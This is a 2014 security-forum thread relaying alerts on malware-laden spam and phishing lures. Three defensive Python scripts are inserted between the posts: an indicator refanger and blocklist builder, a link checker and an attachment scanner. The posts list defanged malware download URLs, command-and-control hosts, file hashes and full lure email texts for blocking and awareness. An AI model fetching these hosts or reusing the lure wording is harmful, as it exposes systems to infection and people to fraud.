SPAM frauds, fakes, and other MALWARE deliveries...



#1251 AplusWebMaster

Posted 07 August 2014 - 06:44 AM

FYI...

Fake CDS invoice SPAM
- http://blog.dynamoo....voice-spam.html
7 Aug 2014 - "This spam email pretends to be from the CDS Group. CDS are a wholly legitimate company and are NOT sending these emails, and their computer systems have NOT been compromised. However, the emails do contain a malicious attachment and should be deleted... CDS have a notice about these emails on their site*. This is a sample email:

Screenshot: https://3.bp.blogspo...0/s1600/cds.png

Attached is an archive file CDS_241-28195.zip which contains a folder invoice_cdsgroup_799543.xls which in turn contains a malicious executable invoice_cdsgroup_799543.xls.scr which has a very low detection rate at VirusTotal of 3/54**. Automated analysis tools are inconclusive at the moment..."
* http://www.cdsgroup....yber-crime.html

** https://www.virustot...sis/1407408295/

- http://threattrack.t...ds-invoice-spam
Aug 7 2014
- https://gs1.wac.edge...05XI1r6pupn.png
Tagged: cds, Lerspeng
___

Vawtrak sites to block
- http://blog.dynamoo....s-to-block.html
7 Aug 2014 - "I found these domains and IPs today while investigating a machine apparently infected with Vawtrak* (aka Tepfer), most of them seem to be active:
http ://80.243.184.239 /posting.php
http ://80.243.184.239 /viewforum.php
http ://146.185.233.97 /posting.php
http ://146.185.233.97 /viewforum.php
http ://ipubling .com/posting.php
http ://ipubling .com/viewforum.php
http ://magroxis .com/posting.php
http ://magroxis .com/viewforum.php
http ://maxigolon .com/viewforum.php
http ://terekilpane .com/viewforum.php
Some of these domains are associated with the email address ctouma2@ gmail .com. You could block the sites individually, but because the sites are not isolated, I would personally recommend using the following blocklist:
146.185.233.0/24
80.243.184.224/27

The 146.185.233.0/24 range is allocated to "Cherepanova" in Russia. 80.243.184.224/27 is Redstation in the UK."
* http://about-threats...KDR_VAWTRAK.YZY
 



Edited by AplusWebMaster, 07 August 2014 - 09:53 AM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
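The Vawtrak post above lists defanged indicators (spaces inserted around ":" and before the TLD) and then recommends two CIDR ranges rather than single hosts. The script below is an added example, not code from the Dynamoo blog or from this thread: it refangs the indicators exactly as printed in the post, separates IPs from domains, and confirms that every IP falls inside the recommended ranges so nothing needs a separate /32 rule. The iptables/hosts-file output format at the end is my own choice, not something the post prescribes.

```python
import ipaddress
import re

# Indicators copied from the Vawtrak post above, still "defanged" the way the
# post prints them (spaces around ":", before the TLD and before the path).
VAWTRAK_IOCS = [
    "http ://80.243.184.239 /posting.php",
    "http ://80.243.184.239 /viewforum.php",
    "http ://146.185.233.97 /posting.php",
    "http ://146.185.233.97 /viewforum.php",
    "http ://ipubling .com/posting.php",
    "http ://ipubling .com/viewforum.php",
    "http ://magroxis .com/posting.php",
    "http ://magroxis .com/viewforum.php",
    "http ://maxigolon .com/viewforum.php",
    "http ://terekilpane .com/viewforum.php",
]

# The two ranges the post recommends instead of per-host blocks.
RECOMMENDED_BLOCKLIST = ["146.185.233.0/24", "80.243.184.224/27"]


def refang(ioc):
    """Turn a defanged indicator back into a bare hostname or IP.

    Handles 'http ://', 'hxxp://', 'example .com', 'example[.]com' and a
    trailing ' /path' as commonly found in threat-intel write-ups.
    """
    s = ioc.strip()
    s = re.sub(r"^(hxxps?|https?)\s*:\s*//\s*", "", s, flags=re.I)
    s = s.replace("[.]", ".").replace("(.)", ".")
    s = re.sub(r"\s*\.\s*", ".", s)     # "ipubling .com" -> "ipubling.com"
    s = re.sub(r"\s*[/?#].*$", "", s)   # drop " /posting.php"
    return s.strip().lower()


def split_hosts(iocs):
    """Return (sorted IPs, sorted domains) from a list of defanged indicators."""
    ips, domains = set(), set()
    for ioc in iocs:
        host = refang(ioc)
        if not host:
            continue
        try:
            ips.add(str(ipaddress.ip_address(host)))
        except ValueError:
            domains.add(host)
    return sorted(ips), sorted(domains)


def covering_networks(ip, cidrs):
    """CIDR blocks from `cidrs` that contain `ip` (empty list if none)."""
    addr = ipaddress.ip_address(ip)
    return [c for c in cidrs if addr in ipaddress.ip_network(c, strict=False)]


def coverage_report(iocs, cidrs):
    """Check that every IP indicator falls inside the recommended ranges.

    An IP left in 'uncovered_ips' would need its own /32 rule; the domains
    always need a DNS/proxy rule, since a CIDR block does not cover them.
    """
    ips, domains = split_hosts(iocs)
    return {
        "ips": ips,
        "domains": domains,
        "uncovered_ips": [ip for ip in ips if not covering_networks(ip, cidrs)],
    }


def as_block_rules(cidrs, domains):
    """Outbound DROP rules for the ranges plus hosts-file lines for the domains."""
    rules = [f"iptables -A OUTPUT -d {c} -j DROP" for c in cidrs]
    rules += [f"0.0.0.0 {d}" for d in domains]
    return rules


if __name__ == "__main__":
    rep = coverage_report(VAWTRAK_IOCS, RECOMMENDED_BLOCKLIST)
    print(rep)
    print("\n".join(as_block_rules(RECOMMENDED_BLOCKLIST, rep["domains"])))
```

Run it as-is to see both IPs land inside the two ranges; feed it a newer IOC list to find which addresses the ranges no longer cover.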


#1252 AplusWebMaster

Posted 08 August 2014 - 05:51 AM

FYI...

Fake RBS SPAM
- http://blog.dynamoo....93549-spam.html
8 Aug 2014 - "This fake RBS spam has a malicious attachment:
    Date:      Thu, 24 Jul 2014 09:33:37 GMT [07/24/14 05:33:37 EDT]
    From:      Annie Wallace[Annie.Wallace@ rbs .co.uk]
    Subject:      RE: Incident IM03393549
    Good Afternoon ,
    Attached are more details regarding your account incident. Please extract the attached
    content and check the details.
    Please be advised we have raised this as a high priority incident and will endeavour to
    resolve it as soon as possible. The incident reference for this is IM03393549.
    We would let you know once this issue has been resolved, but with any further questions
    or issues, please let me know.
    Kind Regards, ...


The attachment is IM03393549.zip containing a malicious executable IM008082014.scr which has a VirusTotal detection rate of 15/42*. The CAMAS report** shows that the malware connects to the following locations to download additional components:
94.23.247.202 /n0808uk/SANDBOXA/0/51-SP2/0/
94.23.247.202 /n0808uk/SANDBOXA/1/0/0/
quesoslaespecialdechia .com/Scripts/n0808uk.zip
energysavingproductsinfo .com/wp-content/uploads/2014/08/n0808uk.zip
The exact nature of the malware is not known, but it is most likely a banking Trojan or Cryptowall.
Recommended blocklist:
94.23.247.202
quesoslaespecialdechia .com
energysavingproductsinfo .com
"
* https://www.virustot...sis/1407490764/

** http://camas.comodo....4663b54ab14b0a3
___

Fake Resume SPAM - malicious attachment
- http://blog.dynamoo....attachment.html
8 Aug 2014 - "This terse spam is malicious:
    Date:      Fri, 8 Aug 2014 05:57:02 +0700 [08/07/14 18:57:02 EDT]
    From:      Janette Sheehan [Janette.Sheehan@linkedin.com]
    Subject:      FW: Resume
    Attached is my resume, let me know if its ok.
    Thanks,
    Janette Sheehan


Attached is an archive Resume.zip which in turn contains a malicious executable Resume.scr. This has a VirusTotal detection rate of 24/54*. The CAMAS report** shows that the malware attempts to phone home to the following locations:
94.23.247.202 /0708stat/SANDBOXA/0/51-SP2/0/
94.23.247.202 /0708stat/SANDBOXA/1/0/0/
hngdecor .com/wp-content/uploads/2013/10/cw2800.zip
welfareofmankind .com/underconst/css/cw2800.zip
Recommended blocklist:
94.23.247.202
hngdecor .com
welfareofmankind .com
"
* https://www.virustot...sis/1407493005/

** http://camas.comodo....58b27ebf5a55d5b

94.23.247.202: https://www.virustot...02/information/
___

Fake HMRC tax SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
7 Aug 2014 - "HMRC taxes application with reference 4DEW NASM CBCG RC6 received pretending to come from noreply@ taxreg .hmrc .gov .uk is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
    The application with reference number 4DEW NASM CBCG RC6 submitted by you or your agent to register for HM Revenue & Customs (HMRC) taxes has been received and will now be verified. HMRC will contact you if further information is needed.
    The original of this email was scanned for viruses by the Government Secure Intranet virus scanning service supplied by Vodafone in partnership with Symantec. (CCTM Certificate Number 2009/09/0052.) On leaving the GSi this email was certified virus free.
    Communications via the GSi may be automatically logged, monitored and/or recorded for legal purposes.


7 August 2014: 4DEW NASM CBCG RC6.zip (8kb) Extracts to 4DEW NASM CBCG RC6.scr
Current Virus total detections: 0/54* . This HMRC taxes application with reference 4DEW NASM CBCG RC6 received is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1407447014/
___

AmericanExpress - PHISH
- http://blog.dynamoo....rn-on-your.html
8 Aug 2014 - "This -fake- AmEx spam appears to lead to a phishing site on multiple URLs:

Screenshot: https://3.bp.blogspo.../amex-phish.png

In this case the link goes to a phishing site... but there seem to be a bunch of them at the moment... IPs in use are:
91.219.29.35 (FLP Kochenov Aleksej Vladislavovich, Ukraine)
188.240.32.75 (SC CH-NET SRL, Romania)
I recommend blocking these IPs:
91.219.29.35
188.240.32.75
"

91.219.29.35: https://www.virustot...35/information/

188.240.32.75: https://www.virustot...75/information/

- http://myonlinesecur...e-key-phishing/
8 Aug 2014
___

Fake e-on energy SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
8 Aug 2014 - "e-on energy Unable to process your most recent bill payment pretending to come from E ON Energy <noreply@ eonenergy .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
... Dear customer,
This e-mail has been sent to you to inform you that we were unable to process your most recent payment of bill.
Please check attached file for more detailed information on this transaction.
IMPORTANT: The actual delivery date may vary from the Delivery By date estimate. Please make sure that there are sufficient available funds in your account to cover your payment beginning a few days before Delivery By date estimate and keep such funds available until the payment is deducted from your account.
If we fail to process a payment in accordance with your properly completed instructions, we will reimburse you any late-payment-related fees.
We apologize for any inconvenience this may cause.


8 August 2014: e-ON-Energy-Bill.zip (15kb) : Extracts to e-ON-Energy-Bill.exe
Current Virus total detections: 7/54* . This e-on energy Unable to process your most recent bill payment is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1407509103/
 



Edited by AplusWebMaster, 08 August 2014 - 11:06 AM.



#1253 AplusWebMaster

Posted 11 August 2014 - 01:00 PM

FYI...

Fake BoA SPAM - PDF malware
- http://myonlinesecur...ke-pdf-malware/
11 Aug 2014 - "Bank of America Alert: A Check Exceeded Your Requested Alert Limit pretending to come from Bank of America Alert <onlinebanking@ ealerts.bankofamerica .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like:
Activity Alert
A check exceeded your requested alert limit
We’re letting you know a check written from your account went over the limit you set for this alert.
For more details please check attached file
Amount:     $32,095.35
Check number:     00000006756
Transaction date:     08/11/2014
You can sign in to Online or Mobile Banking to review this activity...
Security Checkpoint
To confirm the authenticity of messages from us, always look for this Security Checkpoint.
Remember: Always look for your SiteKey® before entering your Passcode. We’ll ask you for your Online ID and Passcode when you sign in.
This is a service email from Bank of America. Please note that you may receive service emails in accordance with your Bank of America service agreements..


11 August 2014: report081114_6897454147412.zip(10kb) : Extracts to report081114_6897454147412.exe
Current Virus total detections: 2/54* ... This Bank of America Alert: A Check Exceeded Your Requested Alert Limit is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1407773230/
___

Citi Corp Spam
- http://threattrack.t...n-approved-spam
Aug 11, 2014 - "Subjects Seen:
    RE: Application Approved
Typical e-mail details:
    Your documents are ready , please sign them and email them back.
    Thank you
    Henri Foley
    Level III Account Management


Malicious File Name and MD5:
    application _apprd_93447836734346.exe  (CAD7B09903F7646EC37E4014DD6E70E4)
    application _apprd_93447836734346.zip (0B4A28D6737B9E27E7BF5B98DBBE6B84)


Screenshot: https://gs1.wac.edge...GBaE1r6pupn.png

Tagged: Citi, Upatre
___

Public Wi-Fi is safe?? ...
- http://nakedsecurity...safe-seriously/
11 Aug 2014 - "... most people still don't understand the potential dangers of public and/or free Wi-Fi, despite doom and gloom headlines about the dangers, which include these:
- A US trio who attacked companies by wardriving - i.e., driving around, scanning for poorly protected wireless networks. Between that and breaking in to install keyloggers, they bilked companies of a total of $3 million (£1.8 million).
- An unsecured Wi-Fi home connection that led to a heavily-armed police SWAT team raiding the wrong home, including breaking down the door of a house, smashing windows and tossing a flashbang stun grenade into a living room.
- Facebook accounts of five US politicians being hijacked after they accessed a free, open, wireless Wi-Fi network.
And those are just a tiny selection of the cherries on that bountiful Wi-Fi tree. Of course, there is also the problem of protecting privacy on public Wi-Fi. In just the past year, we learned that businesses are using Wi-Fi to build shopper profiles on us, and in-flight WiFi providers have been helping feds spy on us..."
(More detail at the sophos URL above.)
Sophos - wireless security myths Video 4:26:
 



Edited by AplusWebMaster, 11 August 2014 - 01:33 PM.



#1254 AplusWebMaster

Posted 12 August 2014 - 04:48 AM

FYI...

Fake Netflix email / Phish
- http://myonlinesecur...f-837-phishing/
12 Aug 2014 - "Your Netflix Account Requires Validation [NVF-837] is an attempt to get access to your Netflix Account... The phishing website in this example is so closely named to the genuine Netflix site, that almost anybody could be fooled by it http ://netflix-validate .com
Email looks like:
Dear Customer,
We recently failed to validate your payment information we hold on record for your account, therefore we need to ask you to complete a brief validation process in order to verify your billing and payment details. Click here to verify your account. Failure to complete the validation process will result in a suspension of your netflix membership. We take every step needed to automatically validate our users, unfortunately in this case we were unable to verify your details. The process will only take a couple of minutes and will allow us to maintain our high standard of account security.
Netflix Support Team ...


Following the link in this 'Your Netflix Account Requires Validation' email or other spoofed emails takes you to a website that looks exactly like the real Netflix site... then through loads of steps to input a lot of private and personal information, including billing address, date of birth and then to an update payment page, where they want credit card and bank details. Not only will this information enable them to use your Netflix account, but also your Bank Account, credit card details, Email details, webspace..."

192.99.188.111: https://www.virustot...11/information/

Diagnostic page for AS16276 (OVH)
- https://www.google.c...c?site=AS:16276
"... over the past 90 days, 2638 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2014-08-11, and the last time suspicious content was found was on 2014-08-11... we found 373 site(s) on this network... that appeared to function as intermediaries for the infection of 821 other site(s)... We found 745 site(s)... that infected 65282 other site(s)..."
___

Fake Order SPAM
- http://myonlinesecur...ke-pdf-malware/
12 Aug 2014 - "Order take 8753884 is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email with subject of Order take < random numbers> arrives with just a subject and no email content except an attachment. It appears to come from various random names at various random companies.

12 August 2014: order 1530875.zip (37 kb) : Extracts to Order-8991617.exe
Current Virus total detections: 1/54* . This Order take 8753884 is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1407832220/
___

Fake new picture or video SPAM – PDF malware
- http://myonlinesecur...ke-pdf-malware/
12 Aug 2014 - "A new picture or video message  pretending to come from getmyphoto@ vodafone .co.uk is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This one wants you to download the -malware- via a tiny URL link in the email, there is no actual attachment. Email looks like:
You have received a picture message from mobile phone number +447584905118
GET MY FOTO
Please note, the free reply expires three days after the original message is sent from the Vodafone network.
Vodafone Service


12 August 2014: f679RqP75G.exe - Current Virus total detections: 0/53*
This 'A new picture or video message' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1407835450/
___

Fake IRS phish...
- http://myonlinesecur...et-refund-card/
12 Aug 2014 - "IRS Get Refund On Your Card pretending to come from IRS <refund@ irs .gov> is one of the phishing attempts to get your bank and credit card information. Email looks like:
We are writing to you because your federal Tax payment (ID: 66116572), recently sent is available for refund.
For your security, new charges on the accounts listed above may be declined. If applicable, you should advise any Additional Card Member(s) on your account that their new charges may also be declined.
For more information, please visit the following link
– https ://sa.www4.irs .gov/irfof/lang/en/irfofgetstatus.jsp?reenter=true
Your prompt response regarding this matter is appreciated.
Sincerely,
IRS Refund Team


Following the link in this 'IRS Get Refund On Your Card' email or -other- spoofed emails takes you to a website that looks exactly like the real IRS site... then through loads of steps to input a lot of private and personal information, including billing address, date of birth and then to an update payment page, where they want credit card and bank details... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email or follow links in them..."
 



Edited by AplusWebMaster, 12 August 2014 - 10:41 AM.

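Two of the phishes in this post rely on the link itself being deceptive: the IRS mail shows a genuine-looking irs.gov URL as the link text while the real target is elsewhere, and the Netflix mail uses a lookalike registration (netflix-validate.com) that is not under netflix.com. The script below is an added example, not code from myonlinesecurity or this thread; it pulls the anchors out of an HTML body and flags both patterns. The BRAND_DOMAINS map, the small suffix list and the sample body (whose hrefs are invented, 198.51.100.7 being a documentation address) are my assumptions, not data from the posts.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Brand keyword -> the domain the brand really uses (assumed here for the two
# brands in the posts above; extend for your own watch list).
BRAND_DOMAINS = {"netflix": "netflix.com", "irs": "irs.gov"}
# Minimal two-level public suffixes so "rbs.co.uk" is not reduced to "co.uk".
TWO_LEVEL_SUFFIXES = {"co.uk", "gov.uk", "org.uk", "ac.uk", "com.au", "co.jp"}


def registrable_domain(host):
    host = host.lower().strip(".")
    if re.fullmatch(r"[\d.]+", host) or ":" in host:
        return host                      # bare IP: nothing to reduce
    labels = host.split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in TWO_LEVEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def lookalike_brand(host):
    """Brand whose name appears in the host while the registrable domain is not the brand's."""
    reg = registrable_domain(host)
    for brand, real in BRAND_DOMAINS.items():
        # word-ish match: "netflix-validate" hits, "firstbank" does not hit "irs"
        if reg != real and re.search(rf"(?<![a-z]){brand}(?![a-z])", host.lower()):
            return brand
    return None


class _Links(HTMLParser):
    """Collect (href, visible text) for every <a> in the body."""

    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href"), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href, self._text = None, []


def extract_links(html):
    p = _Links()
    p.feed(html)
    return p.links


def analyze_links(html):
    """[(href, [findings])] for anchors whose target looks deceptive."""
    out = []
    for href, text in extract_links(html):
        findings = []
        dest = urlparse(href).hostname or ""
        shown = None
        if "." in text and " " not in text:          # anchor text that itself looks like a URL/host
            shown = urlparse(text if "://" in text else "//" + text).hostname
        if shown and registrable_domain(shown) != registrable_domain(dest):
            findings.append(f"text shows {shown} but link goes to {dest}")
        brand = lookalike_brand(dest)
        if brand:
            findings.append(f"{dest} imitates {brand} (real domain {BRAND_DOMAINS[brand]})")
        if findings:
            out.append((href, findings))
    return out


# Constructed body resembling the IRS and Netflix lures above; the hrefs are
# invented (198.51.100.7 is a documentation address), not taken from the posts.
SAMPLE_HTML = """
<p>For more information, please visit the following link</p>
<a href="http://198.51.100.7/irfof/getstatus.php">https://sa.www4.irs.gov/irfof/lang/en/irfofgetstatus.jsp?reenter=true</a>
<p><a href="http://netflix-validate.com/login">Click here to verify your account</a></p>
<p>Questions? Visit <a href="https://www.netflix.com/">netflix.com</a></p>
"""

if __name__ == "__main__":
    for href, why in analyze_links(SAMPLE_HTML):
        print(href, "->", "; ".join(why))
```

The third anchor (text netflix.com, target www.netflix.com) is left alone because both sides reduce to the same registrable domain; a real deployment should swap the tiny suffix set for the public suffix list.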


#1255 AplusWebMaster

Posted 13 August 2014 - 04:14 AM

FYI...

Fake Google drive SPAM - PDF malware
- http://myonlinesecur...019-73-malware/
13 Aug 2014 - "Grady Murphy shared Google Drive:3623019-73 to submit@ <your email address>, pretending to come from Grady Murphy <random name that matches the name inside the email>, Apps Team is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... There are several different versions of this email leading to different infection sites and links. The names of the alleged Google Drive owner who wants to share with you change with each email. There is no attachment with this one and they want you to follow the link and download the file to infect you.
Some of the sites are
http ://energydep .net:8080/Gdrive/GDrive025384.exe
http ://bilingdepp .net:8080/Gdrive/GDrive917302.exe
Email looks like:
Accept Grady Murphy Google Drive ID:3623019-73 request clicking on the link below:
    Confirm request
    Unfortunately, this email is an automated notification, which is unable to receive replies. We’re happy to help you with any questions or concerns you may have. Please contact us directly 24/7 via google .com/support/


13 August 2014: GDrive925483.exe (40kb) Current Virus total detections: 6/54*
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1407913490/

178.238.236.109: https://www.virustot...09/information/
___

Fake PurelyGadgets SPAM - Word doc malware
- http://myonlinesecur...alware-malware/
13 Aug 2014 - "Order id 769019 | PurelyGadgets .com pretending to come from a sender named inform at a random email address is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email arrives written in German language and has a zip attachment that when unzipped drops what appears to be a genuine Word Doc. BUT the Doc contains a macro that will infect you, if you use an out of date or older version of Word. On previewing it, or opening it in Word 2013 (which has macros disabled by default) it tries to tell you to enable macros so that you can read the document. Do -not- ever -enable- macros for any Microsoft Office file received by email unless you are 100% sure that you know the sender and are expecting the file... If you still use an older version of Microsoft Word, then you are at risk of being infected by this... Office 2010 and Office 2013 have macros -disabled- by default...

13 August 2014: Bestellen.zip (100 kb) : Extracts to Bestellen.Doc
Current Virus total detections: 10/54* . All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... when unzipping them and make sure you have “show known file extensions enabled“, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened..."
* https://www.virustot...sis/1407936811/
___

UK Land Registry Spam
- http://threattrack.t...d-registry-spam
Aug 13, 2014 - "Subjects Seen:
    Notification of direct debit of fees
Typical e-mail details:
    Notification Number: 4682787
    Mandate Number: LND4682787
    ###THIS IS AN AUTO NOTIFICATION EMAIL. DO NOT REPLY TO THE SENDER OF THIS EMAIL. IF YOU HAVE A QUERY PLEASE REFER TO THE INFORMATION BELOW ###
    This is notification that Land Registry will debit 1527.00 GBP from your nominated account on or as soon as possible before 18/08/2014.
    Details of fees that we shall be collecting by direct debit for the applications charged are now available to view.
    You can access these by opening attached report.
    If you have an enquiry relating to your VDD account please contact Customer Support at customersupport@ landregistry .gsi .gov.uk or call on 0844 892 1111. For all enquiries, please quote your key number.
    Thank you,
    Land Registry


Malicious File Name and MD5:
    LND_Report_13082014.exe (4E3480ADAF846BE2073246C9879290D2)
    LND_Report_4682787.zip (EAD6A8A2A9613175112E6C75D247B0BC)


Screenshot: https://gs1.wac.edge...Ihd01r6pupn.png

Tagged: UK Land Registry, Upatre
 



Edited by AplusWebMaster, 13 August 2014 - 03:09 PM.

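Nearly every attachment in these posts is the same trick: a ZIP holding an .exe or .scr with a PDF icon (often behind a double extension such as invoice_cdsgroup_799543.xls.scr), which Explorer shows as "invoice_cdsgroup_799543.xls" when known extensions are hidden, plus the PurelyGadgets variant in this post, a legacy .doc carrying a VBA macro. The scanner below is an added example, not code from myonlinesecurity, Dynamoo, mxlab or this thread; it walks a ZIP in memory and flags executable and double extensions, PE images under a document extension, and Office files with a VBA project. The sample archive is constructed for the demo (an "MZ" stub and an OLE header with a _VBA_PROJECT name embedded), not a real sample, and the _VBA_PROJECT string search is a heuristic I chose, not a full OLE parse.

```python
import io
import os
import zipfile

# Extensions Windows runs as programs when double-clicked (not exhaustive).
EXECUTABLE_EXTS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd",
                   ".js", ".jse", ".vbs", ".vbe", ".jar", ".cpl"}
# "Document" extensions the samples on this page hide behind.
DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png"}

PE_MAGIC = b"MZ"                                       # Windows executable
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"        # legacy .doc/.xls container
PDF_MAGIC = b"%PDF"
VBA_MARKER_UTF16 = "_VBA_PROJECT".encode("utf-16-le")  # OLE directory entry name (heuristic)


def explorer_display_name(filename):
    """What Explorer shows with 'hide extensions for known file types' on."""
    base = filename.rsplit("/", 1)[-1]
    stem, _ext = os.path.splitext(base)
    return stem


def name_findings(filename):
    """Flag executable extensions and document-looking double extensions."""
    base = filename.rsplit("/", 1)[-1].lower()
    exts = ["." + p for p in base.split(".")[1:]]
    out = []
    if exts and exts[-1] in EXECUTABLE_EXTS:
        out.append("executable extension " + exts[-1])
        if len(exts) >= 2 and exts[-2] in DOCUMENT_EXTS:
            out.append("double extension disguised as " + exts[-2])
    return out


def has_vba_project(data):
    """Heuristic macro check: OLE file whose directory names a _VBA_PROJECT
    stream, or an OOXML zip carrying vbaProject.bin."""
    if data.startswith(OLE_MAGIC):
        return VBA_MARKER_UTF16 in data
    if data.startswith(b"PK"):
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as inner:
                return any(n.lower().endswith("vbaproject.bin") for n in inner.namelist())
        except zipfile.BadZipFile:
            return False
    return False


def content_findings(filename, data):
    """Compare what the name claims with what the first bytes say."""
    ext = os.path.splitext(filename.lower())[1]
    out = []
    if data.startswith(PE_MAGIC) and ext not in EXECUTABLE_EXTS:
        out.append("PE image under non-executable extension " + (ext or "(none)"))
    if ext == ".pdf" and not data.startswith(PDF_MAGIC):
        out.append("named .pdf but no %PDF header")
    if ext in {".doc", ".xls", ".docm", ".xlsm"} and has_vba_project(data):
        out.append("Office document contains a VBA project (macros)")
    return out


def scan_zip(zip_bytes, max_member=5_000_000):
    """Return [(member name, [findings])] for suspicious members of an archive."""
    report = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir() or info.file_size > max_member:
                continue
            data = zf.read(info)
            findings = name_findings(info.filename) + content_findings(info.filename, data)
            if findings:
                report.append((info.filename, findings))
    return report


def build_sample_zip():
    """Constructed test archive mimicking the attachments described above:
    a PE stub with a double extension inside an .xls-named folder, a legacy
    .doc whose OLE directory names a VBA project, and a harmless text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("invoice_cdsgroup_799543.xls/invoice_cdsgroup_799543.xls.scr",
                    PE_MAGIC + b"\x90\x00" * 64)
        zf.writestr("Bestellen.Doc", OLE_MAGIC + b"\x00" * 32 + VBA_MARKER_UTF16 + b"\x00" * 32)
        zf.writestr("readme.txt", b"nothing to see here\n")
    return buf.getvalue()


if __name__ == "__main__":
    for name, why in scan_zip(build_sample_zip()):
        print(name, "(shown as", repr(explorer_display_name(name)) + ")", "->", "; ".join(why))
```

The name checks alone catch the .scr samples on this page; the content checks are what catch a payload renamed to .pdf, so keep both and treat any hit as grounds to quarantine rather than to open.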


#1256 AplusWebMaster

Posted 14 August 2014 - 05:50 AM

FYI...

Fake Citicorp SPAM – PDF malware
- http://myonlinesecur...ke-pdf-malware/
14 Aug 2014 - "Citicorp Mail Out Report Attached pretending to come from CITICorp <random name @ citicorp .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like:

    From Securitas, please do not reply to this e-mail as it is auto generated.
    For any problems please e-mail derry.andrews@ securitas .uk .com


14 August 2014  Q100515078_Mail Out Report.zip (9kb): Extracts to Q100229861_Mail Out Report.exe
Current Virus total detections: 3/54* . This Citicorp Mail Out Report Attached is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1408010403/
___

Fake Charity Trends SPAM ...
- http://blog.mxlab.eu...9156230_08-xls/
Aug 14, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Oder invoice 9156230_08.xls”. This email is sent from a spoofed address and has the following body:

    Dear *******@*******.co.uk,
    Please find attached invoice #9156230_08 from 13/08/2014.
    Thanks!
    Reyes Mcdaniel .
    We’re happy to help you with any questions or concerns you may have. Please contact us directly 24/7 via hxxp ://www.charitytrends .org/ContactUs.aspx


The attached ZIP file has the name 9156230_08.zip which contains the folder Inv_3145835_453_979154.xls. In this folder the 131 kB large file Inv_3145835_453_979154.xls.scr is found. Please note that the subject line and attachment file names may change with each message.
The trojan is known as Backdoor.Bot.ED. At the time of writing, 1 of the 53 AV engines did detect the trojan at Virus Total*..."
* https://www.virustot...sis/1408011038/

- http://blog.mxlab.eu...ontains-trojan/
Aug 14, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Thank you for your generous donation! Charity Trends .”. This email is sent from a spoofed address and has the following body:

    Charity Trends®
    Dear *******@*******.com,
    Thank you for your generous donation of 2623 GBP, which we received today.
    Your generosity will make an immediate difference in the lives of many people who need your help. The funds raised will go toward them.
    You will find all information about your donation in zip archive.You are making a difference!
    Thanks again for your kindness,
    Elsa Nash ...


The attached ZIP file has the name DON_9683272_90.zip and contains the folder DON_4356984_08_14_14. Inside this folder, the 102 kB large file DON_4356_45984_08_14_14.scr will be found. Please note that the subject line and attachment file names may change with each message. The trojan is known as Trojan/Win32.Zbot, Win32:Malware-gen, HEUR/Malware.QVM20.Gen or Mal/Generic-S... 4/54 VirusTotal*..."
* https://www.virustot...sis/1408011666/
___

Fake Citibank SPAM - PDF malware
